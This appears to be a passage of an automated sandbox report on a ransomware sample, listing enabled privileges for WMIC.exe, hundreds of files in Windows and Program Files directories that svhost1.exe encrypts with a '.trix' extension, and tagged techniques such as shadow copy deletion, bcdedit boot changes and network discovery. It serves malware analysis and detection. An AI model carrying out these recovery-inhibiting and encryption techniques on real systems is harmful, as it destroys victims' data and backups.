Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe
Token: SeSystemProfilePrivilege	1252	WMIC.exe
Token: SeSystemtimePrivilege	1252	WMIC.exe
Token: SeProfSingleProcessPrivilege	1252	WMIC.exe
Token: SeIncBasePriorityPrivilege	1252	WMIC.exe
Token: SeCreatePagefilePrivilege	1252	WMIC.exe
Token: SeBackupPrivilege	1252	WMIC.exe
Token: SeRestorePrivilege	1252	WMIC.exe
Token: SeShutdownPrivilege	1252	WMIC.exe
Token: SeDebugPrivilege	1252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1252	WMIC.exe
Token: SeRemoteShutdownPrivilege	1252	WMIC.exe
Token: SeUndockPrivilege	1252	WMIC.exe
Token: SeManageVolumePrivilege	1252	WMIC.exe
Token: 33	1252	WMIC.exe
Token: 34	1252	WMIC.exe
Token: 35	1252	WMIC.exe
Token: 36	1252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe
Token: SeSystemProfilePrivilege	1252	WMIC.exe
Token: SeSystemtimePrivilege	1252	WMIC.exe
Token: SeProfSingleProcessPrivilege	1252	WMIC.exe
Token: SeIncBasePriorityPrivilege	1252	WMIC.exe
Token: SeCreatePagefilePrivilege	1252	WMIC.exe
Token: SeBackupPrivilege	1252	WMIC.exe
Token: SeRestorePrivilege	1252	WMIC.exe
Token: SeShutdownPrivilege	1252	WMIC.exe
Token: SeDebugPrivilege	1252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1252	WMIC.exe
Token: SeRemoteShutdownPrivilege	1252	WMIC.exe
Token: SeUndockPrivilege	1252	WMIC.exe
Token: SeManageVolumePrivilege	1252	WMIC.exe
Token: 33	1252	WMIC.exe
Token: 34	1252	WMIC.exe
Token: 35	1252	WMIC.exe
Token: 36	1252	WMIC.exe

Drops file in Windows directory 44 IoCs

description	ioc	Process
File created	C:\Windows\DtcInstall.log_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\setupact.log_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\win.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svhost1.exe
File opened for modification	C:\Windows\write.exe	svhost1.exe
File opened for modification	C:\Windows\bfsvc.exe	svhost1.exe
File created	C:\Windows\bootstat.dat_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\splwow64.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\twain_32.dll	svhost1.exe
File created	C:\Windows\explorer.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\Professional.xml	svhost1.exe
File opened for modification	C:\Windows\PFRO.log	svhost1.exe
File opened for modification	C:\Windows\regedit.exe	svhost1.exe
File opened for modification	C:\Windows\splwow64.exe	svhost1.exe
File created	C:\Windows\HelpPane.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\lsasetup.log_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\winhlp32.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\WMSysPr9.prx	svhost1.exe
File opened for modification	C:\Windows\lsasetup.log	svhost1.exe
File created	C:\Windows\PFRO.log_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\explorer.exe	svhost1.exe
File opened for modification	C:\Windows\notepad.exe	svhost1.exe
File created	C:\Windows\WindowsUpdate.log_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\DtcInstall.log	svhost1.exe
File opened for modification	C:\Windows\HelpPane.exe	svhost1.exe
File created	C:\Windows\mib.bin_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\Professional.xml_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\win.ini	svhost1.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	svhost1.exe
File created	C:\Windows\bfsvc.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\bootstat.dat	svhost1.exe
File created	C:\Windows\notepad.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\setupact.log	svhost1.exe
File opened for modification	C:\Windows\hh.exe	svhost1.exe
File opened for modification	C:\Windows\mib.bin	svhost1.exe
File created	C:\Windows\system.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\system.ini	svhost1.exe
File created	C:\Windows\twain_32.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\WindowsShell.Manifest_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Windows\winhlp32.exe	svhost1.exe
File created	C:\Windows\WMSysPr9.prx_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\hh.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\regedit.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Windows\write.exe_ID_625234068_[[email protected]].trix	svhost1.exe

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
1080	net.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
408	bcdedit.exe
1060	bcdedit.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe

Drops file in Program Files directory 346 IoCs

description	ioc	Process
File created	C:\Program Files\CompleteSuspend.rtf_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\readme.txt_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\crashreporter.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\UnprotectUnblock.gif_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\sqmapi.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpAzSubmit.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\MSASCuiL.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpLics.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\application.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\IA2Marshal.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Microsoft Office\AppXManifest.xml_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\platform.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\LockTest.nfo	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\WMPMediaSharing.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\WMPNSSUI.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpRtp.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\SymSrv.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\lgpllibs.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\libEGL.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe.sig	svhost1.exe
File created	C:\Program Files\RedoImport.xla_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\AccessibleHandler.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\install.log_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\libGLESv2.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	svhost1.exe
File created	C:\Program Files\7-Zip\7z.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dependentlibs.list	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpUXSrv.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\install.log	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe.sig_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\CompareHide.WTV_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\AmStatusInstall.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpEng.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\IEShims.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ClientWMIInstall.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\ProtectionManagement.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\freebl3.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\NisLog.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	svhost1.exe
File created	C:\Program Files\BackupProtect.kix_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\EppManifest.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7z.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7zFM.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-localization-l1-2-0.dll	svhost1.exe
File opened for modification	C:\Program Files\RedoExport.docx	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnssci.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\DbgHelp.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpEng.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpResL.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll	svhost1.exe
File created	C:\Program Files\RequestDeny.php_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\UnprotectUnblock.gif	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpshare.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\FepUnregister.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCuiL.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\nss3.dll	svhost1.exe
File opened for modification	C:\Program Files\RedoImport.xla	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	svhost1.exe
File created	C:\Program Files\7-Zip\7-zip.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\osclientcerts.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpconfig.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\DbgHelp.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\MpEvMsg.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\freebl3.dll	svhost1.exe
File created	C:\Program Files\Windows Media Player\mpvis.DLL_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Media Player\setup_wm.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\Accessible.tlb	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-conio-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\msvcp140.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\LimitRead.mp3_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\ReceiveSend.3gpp	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ExtExport.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpRtp.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\mpuxhostproxy.dll	svhost1.exe
File created	C:\Program Files\7-Zip\descript.ion_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\omni.ja_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\CompareHide.WTV	svhost1.exe
File opened for modification	C:\Program Files\InvokeRevoke.xltx	svhost1.exe
File created	C:\Program Files\Microsoft Office\FileSystemMetadata.xml_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\Accessible.tlb_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-runtime-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\CompleteReset.emf	svhost1.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\AMMonitoringProvider.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\DefenderCSP.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\ThirdPartyNotices.txt_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\osclientcerts.dll	svhost1.exe
File created	C:\Program Files\Windows Media Player\WMPNSSUI.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\platform.ini	svhost1.exe
File opened for modification	C:\Program Files\OutSelect.wma	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\hmmapi.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnscfg.exe	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml	svhost1.exe
File opened for modification	C:\Program Files\BackupProtect.kix	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\EppManifest.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpCom.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\PushRequest.snd	svhost1.exe
File created	C:\Program Files\Windows Defender\MSASCui.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\SymSrv.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\Microsoft Office\AppXManifest.xml	svhost1.exe
File created	C:\Program Files\Windows Defender\MpCommu.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe.sig	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\nssckbi.dll	svhost1.exe
File created	C:\Program Files\DebugGet.cab_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\setup_wm.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\default-browser-agent.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\softokn3.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	svhost1.exe
File created	C:\Program Files\OutSelect.wma_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\sqmapi.dll	svhost1.exe
File created	C:\Program Files\Windows Media Player\WMPMediaSharing.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\mpuxhostproxy.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\NisWfp.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ThirdPartyNotices.txt	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.ini	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\vcruntime140.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\iexplore.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	svhost1.exe
File opened for modification	C:\Program Files\GetUnblock.nfo	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-runtime-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\CompleteSuspend.rtf	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmlaunch.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\DataLayer.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7-zip32.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\firefox.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\libEGL.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\ucrtbase.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\ImportGet.eps_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\ExtExport.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\NisWfp.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\AccessibleHandler.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.mof	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\lgpllibs.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\nssckbi.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\update-settings.ini	svhost1.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\Defendericon.png	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	svhost1.exe
File created	C:\Program Files\7-Zip\Uninstall.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpProvider.dll	svhost1.exe
File created	C:\Program Files\RedoExport.docx_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\SaveDismount.wps_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\RequestDeny.php	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmplayer.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\MpOAV.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-conio-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\CompareDismount.jfif	svhost1.exe
File created	C:\Program Files\InvokeResize.asp_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncPS.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.ini	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	svhost1.exe
File opened for modification	C:\Program Files\ReceiveConfirm.temp	svhost1.exe
File created	C:\Program Files\Windows Defender\AmMonitoringInstall.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\FepUnregister.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\MpProvider.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpRes.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozavcodec.dll	svhost1.exe
File created	C:\Program Files\PushRequest.snd_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\RegisterEnable.png_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\SuspendRevoke.dotm	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnetwk.exe	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpnscfg.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\NisSrv.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\DenyHide.docm_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\DenyHide.docm	svhost1.exe
File opened for modification	C:\Program Files\RegisterEnable.png	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-localization-l1-2-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\qipcap64.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\update-settings.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\iediagcmd.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\DataLayer.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\crashreporter.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncPS.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\AmMonitoringInstall.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\MpAzSubmit.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\dependentlibs.list_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\desktop.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\LimitRead.mp3	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmprph.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozavutil.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmlaunch.exe	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpnssci.dll_ID_625234068_[[email protected]].trix	svhost1.exe
